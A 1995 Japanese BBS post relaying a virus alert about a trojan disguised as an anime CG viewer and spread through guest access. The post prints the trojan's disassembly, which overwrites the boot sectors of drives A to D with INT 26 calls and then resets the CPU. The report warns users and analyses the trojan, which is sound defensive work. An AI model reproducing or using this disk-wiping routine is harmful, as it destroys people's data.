#13 Article 9380 Posted at 1995/01/12 00:00:45 by SNOOPY (MAP000) [FREE]

Subject: 追加情報

先程の追加情報です。
私はパソコン通信が好きです、とくにゲストアクセスで各地のネットを旅するのが
大好きです、そんな私にとってここのようにゲストに制限が無いネットは嬉しいです
よくROMさせてもらっています、ここのIDを取りたいと思っていますが
私は今アニメを見ていません、そんな私がIDを取る資格はありませんね
いつか私がアニメのすばらしさに出会った時に、そのときにIDを取得したいと
思います。
ゲストにも色々な人がいますが、私の様な人間もいると言うことを心の片隅にでも
置いて下されば嬉しいと思います。
--------------------------------------

Organization: Tsuporone'S BBS (TSUPO-NET)       Chikusa-Ku, Nagoya, JAPAN


 この情報の転載元は PC-VAN JRUMIC FORUM #2「コミュニケーションボード」
MSG #5394 です。

  BBSのゲストアクセスを使うとは、あくどいですねね。ますますゲストには制
限を付けざるを得なくなって行きますが、こうなると制限を行なっていないBBS
の管理不行届きとも言えますね。しかしまぁ、何処の阿呆がこういう事をやりたが
るんだか。

###############################################################################
>Subj: ウイルス調査・最終報告

【被害】       :EXEファイルを起動させたときに、接続しているハードディスクやフ
                 ロッピィディスクのファイルを抹消する。もちろんundeleteは効か
                 ない。また、常駐は行なわない。

【発見場所】    :パソコン通信ネットワーク「べる☆べる☆ねっとわ~く」内、
                  メッセージボード3番の「フリートーク」にて

【内容】        :

==============================================================================
>Message  # 216 is from: BELGUEST
>Time: 95/01/03 20:31:20 Section 3: なんでもOKのフリートーク
>Subj: 謹賀新年CG
>
>あけましておめでとうございます.
>みなさまお邪魔します.
>うる星やつら-NETの宣伝CGです.
>なお,CGを表示するためのローダは同梱のURS.EXEをお使いください.
>コマンドライン入力により,ヘルプが見れます。
>
><<< urusei_y.lzh for MS-DOS ( use ish & lha ) [ 724 lines ] >>>
【ish部分は危険により削除 by 鎌田 靖彦】
>--- urusei_y.lzh (724/724) ---
>
>うる星やつら-NET  System Operator  蟹瀬 雄太郎
>
>Telephone : 045-547-9498
>            300/1200/2400/9600/14400/28800bps
V.Fast/V.32/V.36ter/V.42/V.42bis
>Facsimile : 045-548-1008 (G3 Mode only)
>Postal No.: 223-00
>Address   : 神奈川県 横浜市 港北区 樽町 2-21-304
>Internet  : UUCP:/http//www.keio-u.ac.jp@pr.89050337//yuu.kanise
>==============================================================================

《ish部分を解凍した内容》

Listing of archive : URUSEI_Y.LZH

  Name          Original    Packed  Ratio   Date     Time   Attr Type  CRC
--------------  --------  -------- ------ -------- -------- ---- ---------
  URS.EXE          35571     15045  42.3% 92-11-06 19:29:18 a--w -lh5-E077
  LUM2.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5-6F24
  LUM3.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5-1246
  LUM4.DAT          4097      3617  88.3% 92-11-02 20:13:26 a--w -lh5-4B77
  LUM5.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5-0A2D
  LUM6.DAT          4097      3617  88.3% 92-11-02 20:13:26 a--w -lh5-C778
  LUM7.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5-5C8B
  LUM8.DAT          4097      3613  88.2% 92-11-02 20:13:26 a--w -lh5-5A1A
  LUM9.DAT          4097      3616  88.3% 92-11-02 20:13:26 a--w -lh5-D546
  LUM1.DAT          4097      3617  88.3% 92-11-02 20:13:26 a--w -lh5-7E81
--------------  --------  -------- ------ -------- --------
    10 files       72444     47597  65.7% 92-11-07 00:08:46

【コメント】    :
ウイルスはURS.EXE内に混入している模様ですが、私(鎌田靖彦)が持っているワクチン
ソフトやスキャンワクチンなどでは無反応でした。(作者がオリジナルで作成したもの
であると思われる)

鎌田靖彦が確認したところによると、電話番号・ファクシミリ番号ともに嘘の記述で、
ファクシミリ番号の方では「現在使用されていません」とのことだそうです。

また、電話番号(アクセス番号)のほうでは「はい、こちらは00(ゼロゼロ)です・
・・」と留守番電話の反応がありました。(ダミーであると思われる)

また、住所は「樽町」以降の「2-21-304」が実在しない住所であることも確認しまし
た。(ちなみに港北区樽町は郵便番号222)

さらに、インターネットのホームページのアドレスも実在しないアドレスになっていま
す。

【解析結果】

解析はBEL00095 KUSA氏のご協力によるものです。
KUSA氏に感謝の意をここで表したいと思います。ありがとうございました。

解析結果です。
ファイル名は.EXEになっていますが、中身は数十バイト程度の.COMモデルになっ
ています。はっきり言って期待外れなのでがっかりです。ウィルスでもなんでも
ありません。ただし、DOS汎用のコマンドでどんな機種上でも実行できてしまうの
であなどれないです。

0100 60             PUSHA
0101 B000           MOV AL,00   ;0:カレントドライブ
0103 BB0000         MOV BX,0000 ;データバッファ先頭アドレス
0106 B9A000         MOV CX,00A0 ;ライトするセクタ数
0109 BA0000         MOV DX,0000 ;開始セクタ番号
010C CD26           INT 26      ;物理セクタライト
010E B001           MOV AL,01   ;A:ドライブ
0110 BB0000         MOV BX,0000
0113 B9A000         MOV CX,00A0
0116 BA0000         MOV DX,0000
0119 CD26           INT 26
011B B002           MOV AL,02   ;B:ドライブ
011D BB0000         MOV BX,0000
0120 B95000         MOV CX,0050
0123 BA0000         MOV DX,0000
0126 CD26           INT 26
0128 B003           MOV AL,03   ;C:ドライブ
012A BB0000         MOV BX,0000
012D B95000         MOV CX,0050
0130 BA0000         MOV DX,0000
0133 CD26           INT 26
0135 B004           MOV AL,04   ;D:ドライブ
0137 BB0000         MOV BX,0000
013A B95000         MOV CX,0050
013D BA0000         MOV DX,0000
0140 CD26           INT 26
0142 61             POPA
0143 B80000         MOV AX,0000 ;CPU SHUTDOWN
0146 E7F0           OUT F0,AX
0148 99             CWD         ;これ以下はゴミ
0149 0270B1         ADD DH,[BX+SI-4F]
                :

処理内容としては分かるとおもいますが、カレントドライブおよび、A:~D:ドラ
イブのすべての先頭セクタをつぶす、原始的なものですね。
あと、最後にリセットをかけていますが、286以降のコマンドなのでV30などでは
意味が無いです。ほかのデータの部分はEO Systemとかいうプログラムをつなぎあ
わせただけのものです。これならコンパイラなしでもSYMDEB.EXEだけで十分でき
ますね。

これをみるとはっきり言って処理の方法も知らない素人以下のレベルですね。
スキャンに引っ掛からないのもうなずけます。

以上、くだらない報告でした^^;
しかし、犠牲者が出たとなるとみすごせないですが。

こうなるとゲストレベルで書き込みができる場所を限定しなくちゃいけないですね。
世の中には心無い人がいて、非常に残念です。

              もっとましなの作れよな  KUSA
                                        E-mail To: kusa@belbel.or.jp

【転載について】

以上のメッセージは転載を無条件で歓迎します。KTBBS以外のホストプログラムで
あっても是非とも転載をしてくださるようよろしくお願いします。
ウイルスの撲滅のため、よろしくお願いします。

連絡先:root@belbel.or.jp もしくは j1592029@c1.kagu.sut.ac.jp
        または、「べる☆べる☆ねっとわ~く」内ID = SYSOP宛

文責:Belphegor こと 鎌田靖彦

発見時刻:1995年1月3日 23:30:00

###############################################################################
 以上。


                           by 阿修羅


---------------------------------------

ゲストアクセスで起きた事件ですが、これによりゲストの制限が出来てしまうのが
非常に残念で、悲しく思えます。
しかし、この様な事をする人がいる以上しかたの無いことです。
たった少しの心ない人達の為に多くの方が迷惑し、いやな気持ちにならなければ
ならないのは、パソコン通信に限った事ではありません、どうしてこの様な事をする
人がいるのか・・・・人間とは悲しい生き物だなと、ふと思ったりしました。

                                                        SNOOPY